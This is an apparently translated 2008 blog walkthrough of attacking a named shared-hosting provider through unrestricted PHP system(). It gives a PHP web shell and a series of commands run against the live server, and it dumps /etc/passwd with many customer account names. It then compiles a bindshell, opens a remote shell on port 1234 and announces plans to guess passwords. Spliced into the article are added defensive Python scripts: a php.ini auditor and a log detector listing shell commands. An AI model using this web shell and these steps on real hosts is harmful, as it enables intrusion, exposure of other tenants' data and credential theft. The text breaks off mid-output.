Building security under Linux: attacks via PHP configuration flaws

王朝 PHP · Author: anonymous  2008-05-19

The problem with these sites lies mainly in allowing functions such as system() and exec(). Anyone familiar with PHP knows that these functions invoke system commands (although a PHP program run through the web server only has the privileges of nobody). Moreover, any ordinary user who signs up for hosting space gets write access to part of the filesystem, which lets them write a web shell program to execute commands. On these servers ordinary users cannot log in, i.e. they are nologin (no login shell; administrators are not that "generous"!), so system() and exec() can be used to bind a shell. This article uses hosting space at Huyi (www.51.net) as the example (I don't know whether all of their servers have this flaw; I only tried the server my own space is on):
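As an added example (not part of the original article, and not 51.net's configuration), here is a small Python audit of the two php.ini directives that decide whether this works: disable_functions, which lists the functions PHP refuses to call, and register_globals, which is what lets a bare $cmd in a script pick up the request's ?cmd= value. The weak and hardened php.ini texts are constructed samples; the function names are PHP's real command-execution functions.

```python
"""Audit php.ini for the command-execution functions the article relies on.

Added example (not code from the original article or from 51.net).
It reads the disable_functions directive the way PHP does (comma-separated
names, surrounding whitespace ignored, case-insensitive) and reports which
shell-spawning functions remain callable, and whether register_globals is
on, which is how a bare $cmd in a script receives the request's ?cmd= value.
"""

# system() and exec() are the two the article names; the rest are PHP's
# other functions that run a command or spawn a process.
SHELL_FUNCTIONS = frozenset({
    "system", "exec", "passthru", "shell_exec",
    "popen", "proc_open", "pcntl_exec",
})


def parse_ini_directives(ini_text: str) -> dict:
    """Return {directive: value} for 'key = value' lines of a php.ini.

    Comment lines (';' or '#') and [section] headers are skipped; when a
    directive repeats, the last occurrence wins, as in PHP's own parser.
    """
    directives = {}
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#[":
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        directives[key.strip().lower()] = value.strip().strip('"')
    return directives


def disabled_functions(ini_text: str) -> set:
    """Function names listed in disable_functions, lower-cased."""
    value = parse_ini_directives(ini_text).get("disable_functions", "")
    return {name.strip().lower() for name in value.split(",") if name.strip()}


def register_globals_enabled(ini_text: str) -> bool:
    """True when register_globals is on (PHP treats on/1/true/yes as on)."""
    value = parse_ini_directives(ini_text).get("register_globals", "off")
    return value.strip().lower() in {"on", "1", "true", "yes"}


def audit_php_ini(ini_text: str) -> list:
    """Shell-spawning functions still callable under this php.ini, sorted."""
    return sorted(SHELL_FUNCTIONS - disabled_functions(ini_text))


# Constructed sample configurations; not taken from any real server.
WEAK_INI = """
[PHP]
; nothing disabled: a tenant's system("$cmd") runs, and register_globals
; hands $cmd the value of ?cmd= straight from the query string
disable_functions =
register_globals = On
"""

HARDENED_INI = """
[PHP]
disable_functions = system, exec, passthru, shell_exec, popen, proc_open, pcntl_exec
register_globals = Off
"""

if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        left = audit_php_ini(ini)
        state = "still callable: " + ", ".join(left) if left else "all shell functions disabled"
        print(f"{label}: {state}; register_globals={'on' if register_globals_enabled(ini) else 'off'}")
```

Run it against the server's real php.ini (php -i | grep disable_functions shows the effective value) rather than the sample texts; on a shared host the hardened list is the setting that turns the article's shell.php3 into a script that merely prints an empty <pre> block.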

1. First write a web shell (easy to do in PHP):

<?php
# shell.php3
# $cmd is filled from the request's ?cmd= parameter (register_globals)
echo "<pre>";
system("$cmd");
echo "</pre>";
?>

2. Upload it to the hosting space.

3. Execute (the actual server is masked):

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=id (see how much privilege we actually have)

uid=171047(xxxx) gid=51(xxx) groups=51(xxx), 65534(nobody)

root really is stingy!

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=uname -ras (check the system)

FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 20 00:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat /etc/passwd (shadow is certainly off limits)

root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:107353:51:USER:/home/tty:/local/bin/null
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
ftp:*:70:70:FTP Daemon:/nonexistent:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
quotauser1:*:997:51:quotauser:/home/quotauser1:/sbin/nologin
quotauser2:*:998:51:quotauser:/home/quotauser2:/sbin/nologin
quotauser3:*:999:51:quotauser:/home/quotauser3:/sbin/nologin
tian:*:1002:1002::/local/tian:/local/bin/ksh
sysadmin:*:1001:1001:System Administrator:/local/sysadmin:/local/bin/ksh
test2:*:9999:51::/home/test2:/local/bin/null
xhjj:*:106200:51:USER:/home/xhjj:/sbin/nologin
zhinan:*:106201:51:USER:/home/zhinan:/local/bin/null
yes2:*:106202:51:USER:/home/yes2:/local/bin/null
daboy:*:106203:51:USER:/home/daboy:/local/bin/null
yesky:*:106204:51:USER:/home/yesky:/local/bin/null
yesk:*:106205:51:USER:/home/yesk:/local/bin/null
lnsyzzg:*:106206:51:USER:/home/lnsyzzg:/local/bin/null
fog:*:106207:51:USER:/home/fog:/local/bin/null
renshou:*:106208:51:USER:/home/renshou:/local/bin/null
hilen:*:106209:51:USER:/home/hilen:/local/bin/null
hapybird:*:106210:51:USER:/home/hapybird:/sbin/nologin
xiewei:*:106211:51:USER:/home/xiewei:/sbin/nologin
wwwer:*:106212:51:USER:/home/wwwer:/local/bin/null
larry:*:106213:51:USER:/home/larry:/local/bin/null
sunboys:*:106214:51:USER:/home/sunboys:/local/bin/null
everydayyuki:*:106215:51:USER:/home/everydayyuki:/local/bin/null
linguanxi:*:106216:51:USER:/home/linguanxi:/local/bin/null
baobao:*:106217:51:USER:/home/baobao:/local/bin/null
chaoshan:*:106218:51:USER:/home/chaoshan:/local/bin/null
hrstudio:*:106219:51:USER:/home/hrstudio:/local/bin/null
dengxian:*:106220:51:USER:/home/dengxian:/local/bin/null
simonstone:*:106221:51:USER:/home/simonstone:/local/bin/null
chenjian:*:106222:51:USER:/home/chenjian:/local/bin/null
lvxiangml:*:106223:51:USER:/home/lvxiangml:/local/bin/null
zzbxaxa:*:106224:51:USER:/home/zzbxaxa:/local/bin/null
pc2000:*:106225:51:USER:/home/pc2000:/local/bin/null
startexcel:*:106226:51:USER:/home/startexcel:/local/bin/null
model:*:106227:51:USER:/home/model:/local/bin/null
leogirl:*:106228:51:USER:/home/leogirl:/local/bin/null
fohcn:*:106229:51:USER:/home/fohcn:/local/bin/null
ljok:*:106230:51:USER:/home/ljok:/local/bin/null
baorui:*:106231:51:USER:/home/baorui:/local/bin/null
fky-jack:*:106232:51:USER:/home/fky-jack:/local/bin/null
zhaowen:*:106233:51:USER:/home/zhaowen:/local/bin/null
xiaojiaoya:*:106234:51:USER:/home/xiaojiaoya:/local/bin/null
zyinter:*:106235:51:USER:/home/zyinter:/local/bin/null
power:*:106236:51:USER:/home/power:/local/bin/null
feefan:*:106237:51:USER:/home/feefan:/local/bin/null
paradise:*:106238:51:USER:/home/paradise:/local/bin/null
wulc:*:106239:51:USER:/home/wulc:/local/bin/null
jcm:*:106240:51:USER:/home/jcm:/local/bin/null
liangxiaom:*:106241:51:USER:/home/liangxiaom:/local/bin/null
jingder:*:106242:51:USER:/home/jingder:/local/bin/null
hanjun:*:106243:51:USER:/home/hanjun:/local/bin/null
adai:*:106244:51:USER:/home/adai:/local/bin/null
fightben:*:106245:51:USER:/home/fightben:/local/bin/null
lihonghui-ooo:*:106246:51:USER:/home/lihonghui-ooo:/local/bin/null
xeno:*:106247:51:USER:/home/xeno:/local/bin/null
.................. (too many; omitted)

Only a few users have a shell and can log in. cp it into my directory; later I'll split out the usernames and see whether anyone has username=passwd, heh.

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=set

HOME=/
PS1=$
OPTIND=1
PS2=
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin
IFS=

What a poor "environment", set up like this....

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat /etc/hosts

# $FreeBSD: src/etc/hosts,v 1.9.2.1 1999/08/29 14:18:44 peter Exp $
#
# Host Database
# This file should contain the addresses and aliases
# for local hosts that share this file.
# In the presence of the domain name service or NIS, this file may
# not be consulted at all; see /etc/host.conf for the resolution order.
#
#
127.0.0.1 localhost localhost.my.domain myname.my.domain
#
# Imaginary network.
#10.0.0.2 myname.my.domain myname
#10.0.0.3 myfriend.my.domain myfriend
#
# According to RFC 1918, you can use the following IP networks for
# private nets which will never be connected to the Internet:
#
# 10.0.0.0 - 10.255.255.255
# 172.16.0.0 - 172.31.255.255
# 192.168.0.0 - 192.168.255.255
#
#

Not that small, this hosts file~

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=whereis -b gcc (fingers crossed there is a gcc)

gcc:/usr/sbin/gcc (Hooray!!!!!!!!!!!!)

Let me try: push a big one up, compile it, haha, so fast!

The web shell is too tiring; binding a shell is more convenient... (upload a bindshell program; you can also write your own in Perl/C, neither is hard)

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=gcc -o bind bindshell.c

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=./bind 1234

bind shell too port 1234

telnet xxx.51.net 1234

..... the rest is omitted; anyway, commands can now be executed.
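Added example, not from the original article: the request pattern used above (shell.php?cmd=id, cmd=uname -ras, cmd=cat /etc/passwd, cmd=gcc -o bind bindshell.c, cmd=./bind 1234) leaves a plain query-string trail in the web server's access log, which is where a hosting operator would catch a tenant script being used as a shell. The Python below parses Apache combined-format lines and flags query parameters whose value reads as a command line. The log lines, client addresses, timestamps and sizes are constructed.

```python
"""Flag web-shell command traffic in an Apache combined-format access log.

Added example, not from the original article. Requests such as
shell.php?cmd=id, cmd=uname -ras, cmd=cat /etc/passwd or cmd=./bind 1234
leave a query-string trail in the server's access log; this script parses
each line and flags parameters whose value reads as a shell command line,
so an operator can see which tenant script is acting as a shell and from
which client address.
"""
import re
import shlex
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format (client, identity, user, time, request, ...).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Commands a web shell is typically asked to run (first token of the value).
SHELL_COMMANDS = frozenset({
    "id", "whoami", "uname", "cat", "ls", "set", "env", "whereis", "which",
    "gcc", "cc", "wget", "curl", "nc", "telnet", "chmod", "perl", "python",
    "sh", "bash", "rpcinfo",
})

# Parameter names that web shells conventionally use for the command.
CMD_PARAM_NAMES = frozenset({"cmd", "command", "exec", "shell", "c", "run"})

# A first token that is a path into a binary directory, or a relative
# ./program, is a command regardless of the parameter name.
EXEC_PATH_RE = re.compile(r"^(\./|/(usr/)?(local/)?s?bin/)")


def looks_like_command(param: str, value: str) -> bool:
    """True if a query parameter value reads as a shell command line."""
    try:
        tokens = shlex.split(value)
    except ValueError:          # unbalanced quotes: fall back to a plain split
        tokens = value.split()
    if not tokens:
        return False
    first = tokens[0]
    if EXEC_PATH_RE.match(first):
        return True             # ./bind 1234, /usr/sbin/rpcinfo -p
    if first not in SHELL_COMMANDS:
        return False
    if param.lower() in CMD_PARAM_NAMES:
        return True             # shell.php?cmd=id
    # A known command name inside an ordinary parameter counts only when it
    # is followed by option- or path-like arguments: "cat /etc/passwd" is
    # flagged, "set theory" typed into a search box is not.
    return any(t.startswith(("-", "/")) for t in tokens[1:])


def detect_shell_requests(log_text: str) -> list:
    """Return (client_ip, script_path, param, command) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a combined-format line
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if looks_like_command(name, value):
                hits.append((m.group("ip"), parts.path, name, value))
    return hits


def summarize(hits) -> dict:
    """Count flagged requests per (client_ip, script_path)."""
    counts = {}
    for ip, path, _, _ in hits:
        counts[(ip, path)] = counts.get((ip, path), 0) + 1
    return counts


# Constructed sample log; client addresses, times and sizes are invented.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Mar/2001:01:02:03 +0800] "GET /cgi-bin/shell.php?cmd=id HTTP/1.0" 200 128 "-" "Lynx/2.8.3"
203.0.113.7 - - [20/Mar/2001:01:02:09 +0800] "GET /cgi-bin/shell.php?cmd=uname%20-ras HTTP/1.0" 200 211 "-" "Lynx/2.8.3"
203.0.113.7 - - [20/Mar/2001:01:02:31 +0800] "GET /cgi-bin/shell.php?cmd=cat%20/etc/passwd HTTP/1.0" 200 4096 "-" "Lynx/2.8.3"
198.51.100.4 - - [20/Mar/2001:01:03:00 +0800] "GET /index.php?page=about HTTP/1.0" 200 2048 "-" "Mozilla/4.0"
203.0.113.7 - - [20/Mar/2001:01:05:44 +0800] "GET /cgi-bin/shell.php?cmd=gcc%20-o%20bind%20bindshell.c HTTP/1.0" 200 12 "-" "Lynx/2.8.3"
203.0.113.7 - - [20/Mar/2001:01:05:50 +0800] "GET /cgi-bin/shell.php?cmd=./bind%201234 HTTP/1.0" 200 30 "-" "Lynx/2.8.3"
198.51.100.4 - - [20/Mar/2001:01:06:10 +0800] "GET /search.php?q=set%20theory HTTP/1.0" 200 900 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    for ip, path, name, cmd in detect_shell_requests(SAMPLE_LOG):
        print(f"{ip} {path} {name}={cmd!r}")
    print(summarize(detect_shell_requests(SAMPLE_LOG)))
```

Only GET requests show the command in the access log; a shell that takes its command via POST needs request-body logging or a web application firewall in front of PHP, and on this host the bind shell on port 1234 is afterwards visible only as an unexpected listening socket owned by nobody (sockstat or netstat -an on FreeBSD), not in the web log at all.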

Hmm, it seems this box does not have MySQL installed, a pity, heh~~~~~~~~~. Oh right, oso.com.cn seems to have it, though it was shut down recently.....

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=/usr/sbin/rpcinfo -p

localhost
portmapper 100000 portmap sunrpc
rstatd 100001 rstat rstat_svc rup perfmeter
rusersd 100002 rusers
nfs 100003 nfsprog
ypserv 100004 ypprog
mountd 100005 mount showmount
ypbind 100007
walld 100008 rwall shutdown
yppasswdd 100009 yppasswd
etherstatd 100010 etherstat
rquotad 100011 rquotaprog quota rquota
sprayd 100012 spray
3270_mapper 100013
rje_ma
